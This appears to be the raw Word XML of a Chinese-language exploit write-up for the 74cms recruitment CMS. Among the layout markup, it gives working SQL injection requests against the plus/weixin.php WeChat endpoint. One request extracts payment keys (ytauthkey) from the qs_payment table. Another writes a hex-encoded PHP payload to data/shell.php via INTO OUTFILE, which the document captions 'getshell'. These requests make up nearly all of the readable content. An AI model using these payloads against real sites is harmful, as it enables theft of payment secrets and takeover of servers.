          <w:rFonts w:ascii="Times New Roman"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s1130" type="#_x0000_t202" style="width:337.5pt;height:295.3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POST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 xml:space="preserve">/74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d325 </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>5bfef95601890afd80709 HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2" w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="3070"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>Content-Type: application/xml User-Agent: http4e/5.0.12 Host: **</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>.*</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>*.**.**:8081 Content-Length: 226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&lt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>xml</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="1"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Times New Roman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r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>&lt;ToUserName&gt;111&lt;/ToUserName&gt;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</w:rPr>
                    <w:t xml:space="preserve">&lt;FromUserName&gt;1111&amp;apos; union select </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2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1</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>,22</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>#&lt;/FromUserName&gt;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&lt;Content</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>&gt;2222&lt;/Content&gt;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&lt;Event&gt;CLICK&lt;/Event&gt;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&lt;EventKey&gt;binding&lt;/EventKey&gt;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&lt;/xml&gt;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292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:group id="_x0000_s1055" style="position:absolute;left:0;text-align:left;margin-left:80.45pt;margin-top:18pt;width:338pt;height:221.4pt;z-index:9544;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1609,360" coordsize="6760,4428">
            <v:rect id="_x0000_s1129" style="position:absolute;left:1617;top:368;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1128" style="position:absolute;left:1797;top:611;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1127" style="position:absolute;left:2279;top:611;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1126" style="position:absolute" from="1612,365" to="8366,365" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1125" style="position:absolute" from="1614,363" to="1614,874" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1124" style="position:absolute" from="8364,368" to="8364,874" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1123" style="position:absolute;left:1617;top:874;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1122" style="position:absolute;left:1797;top:937;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1121" style="position:absolute" from="1614,874" to="1614,1200" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1120" style="position:absolute" from="8364,874" to="8364,1200" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1119" style="position:absolute;left:1617;top:1200;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1118" style="position:absolute;left:1797;top:1263;width:2530;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1117" style="position:absolute;left:4327;top:1263;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1116" style="position:absolute;left:4448;top:1263;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1115" style="position:absolute" from="1614,1200" to="1614,1526" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1114" style="position:absolute" from="8364,1200" to="8364,1526" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1113" style="position:absolute;left:1617;top:1526;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1112" style="position:absolute;left:1797;top:1589;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1111" style="position:absolute;left:3363;top:1589;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1110" style="position:absolute;left:3484;top:1589;width:1807;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1109" style="position:absolute;left:5291;top:1589;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1108" style="position:absolute" from="1614,1526" to="1614,1852" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1107" style="position:absolute" from="8364,1526" to="8364,1852" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1106" style="position:absolute;left:1617;top:1852;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1105" style="position:absolute;left:1797;top:1915;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1104" style="position:absolute;left:3122;top:1915;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1103" style="position:absolute;left:3243;top:1915;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1102" style="position:absolute" from="1614,1852" to="1614,2178" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1101" style="position:absolute" from="8364,1852" to="8364,2178" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1100" style="position:absolute;left:1617;top:2178;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1099" style="position:absolute;left:1797;top:2241;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1098" style="position:absolute;left:2399;top:2241;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1097" style="position:absolute;left:2520;top:2241;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1096" style="position:absolute" from="1614,2178" to="1614,2504" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1095" style="position:absolute" from="8364,2178" to="8364,2504" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1094" style="position:absolute;left:1617;top:2504;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1093" style="position:absolute;left:1797;top:2567;width:1807;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1092" style="position:absolute;left:3604;top:2567;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1091" style="position:absolute;left:3725;top:2567;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1090" style="position:absolute" from="1614,2504" to="1614,2830" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1089" style="position:absolute" from="8364,2504" to="8364,2830" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1088" style="position:absolute;left:1617;top:2830;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1087" style="position:absolute" from="1614,2830" to="1614,3156" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1086" style="position:absolute" from="8364,2830" to="8364,3156" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1085" style="position:absolute;left:1617;top:3156;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1084" style="position:absolute;left:1797;top:3219;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1083" style="position:absolute" from="1614,3156" to="1614,3482" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1082" style="position:absolute" from="8364,3156" to="8364,3482" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1081" style="position:absolute;left:1617;top:3482;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1080" style="position:absolute;left:1797;top:3545;width:3374;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1079" style="position:absolute" from="1614,3482" to="1614,3808" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1078" style="position:absolute" from="8364,3482" to="8364,3808" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1077" style="position:absolute;left:1617;top:3808;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1076" style="position:absolute;left:1797;top:3871;width:2892;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1075" style="position:absolute;left:4689;top:3871;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1074" style="position:absolute;left:4809;top:3871;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1073" style="position:absolute;left:5412;top:3871;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1072" style="position:absolute;left:5532;top:3871;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1071" style="position:absolute;left:6255;top:3871;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1070" style="position:absolute;left:6376;top:3871;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1069" style="position:absolute;left:7219;top:3871;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1068" style="position:absolute" from="1614,3808" to="1614,4134" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1067" style="position:absolute" from="8364,3808" to="8364,4134" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1066" style="position:absolute;left:1617;top:4134;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1065" style="position:absolute;left:1797;top:4197;width:6025;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1064" style="position:absolute;left:7822;top:4197;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1063" style="position:absolute" from="1614,4134" to="1614,4460" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1062" style="position:absolute" from="8364,4134" to="8364,4460" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1061" style="position:absolute;left:1617;top:4460;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1060" style="position:absolute;left:1797;top:4523;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1059" style="position:absolute;left:2279;top:4523;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1058" style="position:absolute" from="1614,4460" to="1614,4786" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1057" style="position:absolute" from="8364,4460" to="8364,4786" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:shape id="_x0000_s1056" type="#_x0000_t202" style="position:absolute;left:1614;top:365;width:6750;height:4421" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="9"/>
                      <w:rPr>
                        <w:rFonts w:ascii="MS Mincho"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr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POST</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126" w:line="391" w:lineRule="auto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w w:val="95"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t xml:space="preserve">/74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d325 </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>5bfef95601890afd80709 HTTP/1.1</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="183" w:right="3072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Content-Type: application/xml User-Agent: http4e/5.0.</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>12 Host: **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.*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*.**.**:8081 Content-Length: 303</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="12"/>
                      <w:rPr>
                        <w:rFonts w:ascii="MS Mincho"/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr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&lt;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xml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&gt;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&lt;ToUserName&gt;111&lt;/ToUserName&gt;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="21" w:line="326" w:lineRule="exact"/>
                      <w:ind w:left="183" w:right="528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 xml:space="preserve">&lt;FromUserName&gt;1111&amp;apos; union select (select </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:w w:val="95"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>group_</w:t>
                    </w:r>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:w w:val="95"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>concat(</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:w w:val="95"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t xml:space="preserve">id,0x7c,typename,0x7c,ytauthkey,0x5d) </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>from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宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取支付相关的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-56"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr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4"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="7"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="229"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
        </w:rPr>
        <w:pict>
          <v:group id="_x0000_s1028" style="width:338pt;height:107.3pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6760,2146">
            <v:rect id="_x0000_s1054" style="position:absolute;left:8;top:3;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1053" style="position:absolute;left:188;top:66;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1052" style="position:absolute" from="5,3" to="5,328" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1051" style="position:absolute" from="6755,3" to="6755,328" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1050" style="position:absolute;left:8;top:328;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1049" style="position:absolute;left:188;top:392;width:3615;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1048" style="position:absolute" from="5,328" to="5,654" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1047" style="position:absolute" from="6755,328" to="6755,654" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1046" style="position:absolute;left:8;top:654;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1045" style="position:absolute;left:188;top:718;width:2771;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1044" style="position:absolute" from="5,654" to="5,980" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1043" style="position:absolute" from="6755,654" to="6755,980" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1042" style="position:absolute;left:8;top:981;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1041" style="position:absolute;left:188;top:1043;width:2410;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1040" style="position:absolute" from="5,981" to="5,1307" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1039" style="position:absolute" from="6755,981" to="6755,1307" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1038" style="position:absolute;left:8;top:1306;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1037" style="position:absolute;left:188;top:1369;width:3735;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1036" style="position:absolute" from="5,1306" to="5,1632" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1035" style="position:absolute" from="6755,1306" to="6755,1632" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s1034" style="position:absolute;left:8;top:1633;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s1033" style="position:absolute;left:188;top:1696;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s1032" style="position:absolute" from="3,2141" to="6757,2141" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1031" style="position:absolute" from="5,1633" to="5,2143" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s1030" style="position:absolute" from="6755,1633" to="6755,2143" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:shape id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:5;top:3;width:6750;height:2139" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="64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qs_payment),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="124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18</w:t>
                    </w:r>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>,19,20,21,22</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>#&lt;/FromUserName&gt;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&lt;Content&gt;2222&lt;/Content&gt;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&lt;Event&gt;CLICK&lt;/Event&gt;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&lt;EventKey&gt;apply_jobs&lt;/EventKey&gt;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="183" w:right="50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&lt;/xml&gt;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2EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="63"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:17.55pt;width:337.5pt;height:327.95pt;z-index:9616;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page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11"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana"/>
                      <w:sz w:val="19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POST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 xml:space="preserve">/74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d325 </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>5bfef95601890afd80709 HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="3070"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>Content-Type: application/xml User-Agent: http4e/5.0.12 Host: **</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>.*</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>*.**.**:8081 Content-Length: 324</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="10"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana"/>
                      <w:sz w:val="26"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="1"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>&lt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>xml</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>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&lt;ToUserName&gt;111&lt;/ToUserName&gt;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</w:rPr>
                    <w:t>&lt;FromUserName&gt;1111&amp;apos; union select</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 0x3C3F70687020706870696E666F28293B3F3E</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>,2,3,4,5,6,7,8</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>,</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="198" w:lineRule="exact"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>9,10,11,12,13,14,15,16,17,18,19,20,21,22 INTO OUTFILE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&amp;apos;/var/www/html/74cms/data/shell.php&amp;apos;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#&lt;/FromUserName&gt;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&lt;Content&gt;2222&lt;/Content&gt;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&lt;Event&gt;CLICK&lt;/Event&gt;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&lt;EventKey&gt;binding&lt;/EventKey&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>&lt;/xml&gt;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rFonts w:ascii="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>tshell</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
